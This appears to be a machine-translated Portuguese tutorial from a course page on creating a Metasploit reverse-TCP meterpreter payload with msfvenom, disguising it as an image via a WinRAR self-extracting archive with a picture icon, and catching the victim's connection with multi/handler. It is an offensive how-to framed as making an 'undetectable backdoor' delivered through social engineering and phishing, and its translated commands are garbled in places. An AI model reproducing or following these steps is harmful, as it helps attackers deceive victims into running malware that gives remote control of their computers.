Metasploit – Esconder Virus Payload in JPG Image-Undetectable Backdoor

A este novo tutorial, portanto, neste tutorial, mostraremos como criar uma carga útil indetectável ou vírus com metasploit e vincularemos a carga útil como uma imagem. Portanto, o tópico de hoje será muito interessante, Vamos começar =>

Categorias: , , ,

Descrição

Passo 1 :

Criando uma carga útil executável:

Ligue sua máquina kali e abra o terminal, e abra o metasploit, que tem a capacidade de criar uma carga útil executável; isso pode ser extremamente útil se você conseguir que uma máquina de destino execute o executável.

Os invasores costumam usar engenharia social, phishing e outros ataques para fazer com que uma vítima execute uma carga útil. Se os invasores conseguem fazer com que a vítima execute uma carga útil, não há razão para um invasor encontrar e explorar software vulnerável, então, pessoal, vamos começar primeiro. use o veneno de MSF para injetar uma carga reversa de intérprete em nosso executável, então siga minhas etapas neste tutorial.

Abra o terminal E digite o seguinte comando

  • msfvenom -p windows / meterpreter / reverse_tcp LHOST = (Digite seu endereço IP) LPORT = 4444 -f exe> virus.exe

Ele criará um arquivo virus.exe para nós em nosso diretório pessoal, basta copiá-lo e colá-lo em uma máquina Windows para os próximos passos.

Passo 2 :

Vinculando o vírus a um arquivo de imagem:

Depois de copiá-lo para a máquina Windows, precisamos abrir um site , vamos fazer o trabalho =>

  • acesse este URL e faça o upload da sua imagem e personalize-a como desejar

agora, se você quiser cortar a imagem, poderá pular o segundo passo; portanto, você pode pular o terceiro passo também se não quiser aplicar nenhum estilo à imagem e vamos fazer o quarto e último passo = >

basta escolher a opção Tamanhos personalizados e Tamanho original e clicar no botão Converter ICO para obter seu ícone

Agora baixe o ícone

Agora, esses são nossos arquivos
1 => o arquivo virus.exe, 2 => a imagem do ícone que baixamos e, 3 => a imagem que usaremos

Então vamos ligá-lo agora, siga os passos simples, só precisamos e Winrar para fazer isso, parece loucura?

Agora selecione os dois arquivos da imagem que você possui e o arquivo virus.exe, clique com o botão direito do mouse e escolha a opção (Adicionar ao arquivo morto )

Agora faça isso como mostrado na imagem abaixo

Agora vá para a guia Avançado e pressione o botão de opções SFX, conforme mostrado na imagem abaixo

Na guia Configuração

Na guia Modos

Na guia Texto e ícone

Agora clique no botão OK e salve o arquivo. Ele irá gerar um arquivo de extensão virus.sfx .

Etapa 3 :

Inicie o Multi / Manipulador:

Abra o Msfconsole no seu terminal e digite o seguinte comando

  • msfconsole

Uma vez que selecionamos uma carga útil de metro reverso, precisamos configurar o manipulador de exploração para lidar com a conexão de volta à nossa máquina atacante

Abra o seu terminal e digite este comando

  • use exploit / multi / manipulador
  • definir janelas de carga útil / meterpreter / reverse_tcp
  • definir LHOST (seu endereço IP)
  • definir LPORT 4444
  • mostrar opções

Agora inicie o manipulador para recuperar a conexão. Quando a vítima abrir a imagem, você recuperará a conexão

Passo 4 :

Agora estou abrindo a imagem, vamos ver o que temos em nossa máquina kali

Agora voltamos a conexão

Vamos verificar as informações do sistema da máquina vítima que acabamos de hackear

  • sysinfo

Você pode fazer mais coisas. Basta verificar a lista de comandos e tentar

  • Socorro

Se você tiver algum erro, avise-me na seção de comentários abaixo

Detalhes do Curso

  • Leituras 0
  • Quizzes 0
  • Duração 50 horas
  • Nível de Habilidade Todos os níveis
  • Linguagem Inglês
  • Alunos 0
  • Critérios de avaliação Sim
Lista de Desejos